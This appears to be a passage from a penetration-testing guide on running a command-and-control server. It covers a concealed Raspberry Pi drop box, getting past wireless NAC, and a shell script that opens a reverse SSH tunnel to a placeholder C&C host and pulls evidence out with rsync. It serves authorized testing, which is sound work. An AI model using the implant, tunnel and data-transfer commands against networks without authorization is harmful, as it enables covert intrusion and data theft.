
Command and control servers

Command and control (C&C) servers have a bad reputation because attackers rely on them to deliver malware and other payloads to the hosts they have compromised. The same property that makes them useful to an attacker, a reachable host that gathers data from many endpoints, makes them useful to a penetration tester. A C&C server is the natural place to ship the data and evidence you collect to an offsite system where you can review, organize, and finalize it. You never want to leave evidence that you were on a particular system, nor any files or findings behind; collecting everything on the C&C server gives you a single source for all your penetration-testing evidence and nothing to clean up on the target.

Where your C&C server resides is up to you. Most of the time, C&C servers live in someone's cloud, whether AWS, Azure, or any other cloud flavor of your choice. It doesn't have to be cloud-based, though: you could run a server in your company office or in your home lab, as long as you have a secure channel back to it. The choice is yours. Whatever you pick, it needs the following:

  • Reliable connectivity, reachable from the target network over whatever egress is available
  • The ability to access it remotely
  • A channel to the local on-premises box
  • It must be cost-effective

C&C servers can be anywhere and anything, but there are still some requirements to meet if the setup is going to streamline your penetration test rather than hamper it.

Here are some of the requirements that you may need for a penetration-testing C&C server setup:

  • Processing capability: You will need it to drill into large packet captures with Wireshark, crack passwords, or run any other CPU-intensive tool. Make sure the system has enough processing power (and, for hash cracking, a GPU helps) to finish these tasks in a reasonable time. If it takes 30 days to crack a wireless password that changes every week, the task is pointless. Keep this in mind when picking the specifications of the system.
  • 500 GB+ of disk space: Evidence adds up as the penetration test goes on. Findings such as your notes are small, but screenshots and traffic captures grow quickly. Provision as much space as you can; it never hurts to overprovision here.
  • Local on-prem box: You will want a box on-site that talks to your C&C server remotely. I prefer the Raspberry Pi for this task: it is small and easy to conceal, yet powerful enough to run a full operating system such as Kali. Since this box does not perform heavy processing, it does not need to be a full-sized laptop or server; it only has to collect data and pass it over. Give it a wireless interface if possible, for additional connectivity options. Many companies run NAC solutions that detect unknown wired devices but are often less stringent on the wireless side, and depending on whether or not the company knows you have a device there, the port you jack into may sit on a VLAN with no Internet access. I prefer wireless so that I can join a guest SSID or another non-corporate, unrestricted SSID and do my transfers at will. Ideally it also has multiple wireless interfaces, so one can carry the uplink while the others are used for wireless attacks, plus a Bluetooth interface.
  • Secure channel between the local box and the C&C server: This is typically a reverse SSH tunnel, initiated outbound from the on-site box to the C&C server, so it works through NAT and egress filtering without any inbound rule at the client site. Make sure it is encrypted and authenticated (key-based login, with the C&C host key pinned on the box) so that nobody can intercept your evidence and use it against the company you are working for.
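The following is an added example of the reverse SSH tunnel described above; it is not code from the book. It assumes OpenSSH 7.8 or later on both ends, a dedicated unprivileged account named `tunnel` on the C&C server, the hostname `cnc.example.net`, and an ed25519 key used only for the tunnel. The C&C-side `authorized_keys` entry restricts that key to opening this one loopback listener, so a captured Pi cannot be turned into a general-purpose foothold on your evidence server.

```shell
#!/bin/sh
# Added example (not from the book): reverse SSH tunnel from the on-site Raspberry Pi
# to the C&C server. Hostname, account, ports and key paths are assumptions; override
# them with environment variables.

CNC_HOST="${CNC_HOST:-cnc.example.net}"            # assumed C&C hostname
CNC_USER="${CNC_USER:-tunnel}"                     # assumed unprivileged tunnel account on the C&C
CNC_PORT="${CNC_PORT:-443}"                        # outbound 443 usually survives egress filtering
REMOTE_BIND_PORT="${REMOTE_BIND_PORT:-2222}"       # loopback port the C&C opens back to the Pi
PI_TUNNEL_KEY="${PI_TUNNEL_KEY:-$HOME/.ssh/pi_tunnel_ed25519}"
PI_KNOWN_HOSTS="${PI_KNOWN_HOSTS:-$HOME/.ssh/cnc_known_hosts}"  # pinned C&C host key

# Client-side command, built as a string so it can be inspected before use.
#  -N -T        : no remote command, no pty; the session exists only for the forward
#  -R 127.0.0.1:PORT:127.0.0.1:22 : bind on the C&C loopback only (GatewayPorts stays off)
#  ExitOnForwardFailure : die (and get restarted) if the remote port is already taken
#  ServerAlive* : detect a dead link within ~90 s instead of hanging forever
#  StrictHostKeyChecking=yes + dedicated known_hosts : refuse an impostor C&C
tunnel_cmd() {
  printf '%s' \
    "ssh -i $PI_TUNNEL_KEY -p $CNC_PORT -N -T" \
    " -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3" \
    " -o StrictHostKeyChecking=yes -o UserKnownHostsFile=$PI_KNOWN_HOSTS" \
    " -R 127.0.0.1:$REMOTE_BIND_PORT:127.0.0.1:22" \
    " $CNC_USER@$CNC_HOST"
}

# Server-side authorized_keys line for the Pi's public key ($1 is the 'ssh-ed25519 AAAA... comment'
# string). 'restrict' turns off pty, agent/X11 forwarding and ~/.ssh/rc; 'port-forwarding'
# re-enables forwarding but 'permitlisten' limits it to this one loopback port.
authorized_keys_entry() {
  pub="$1"
  printf 'restrict,port-forwarding,permitlisten="127.0.0.1:%s" %s\n' "$REMOTE_BIND_PORT" "$pub"
}

# Keep the tunnel up: ssh exits when the link dies, so just reconnect after a short pause.
# (Equivalent to a minimal autossh; run it from a systemd unit or rc.local on the Pi.)
run_tunnel() {
  while :; do
    eval "$(tunnel_cmd)"
    sleep 15
  done
}

# Only start the loop when explicitly asked, so sourcing this file is side-effect free.
if [ "${TUNNEL_START:-0}" = "1" ]; then
  run_tunnel
fi
```

With the tunnel up, you reach the Pi from the C&C server with `ssh -p 2222 pi@127.0.0.1` and pull evidence with `rsync -az -e 'ssh -p 2222' pi@127.0.0.1:/evidence/ ~/evidence/site-a/`; nothing on the client network ever sees an inbound connection, and the listener never leaves the C&C loopback.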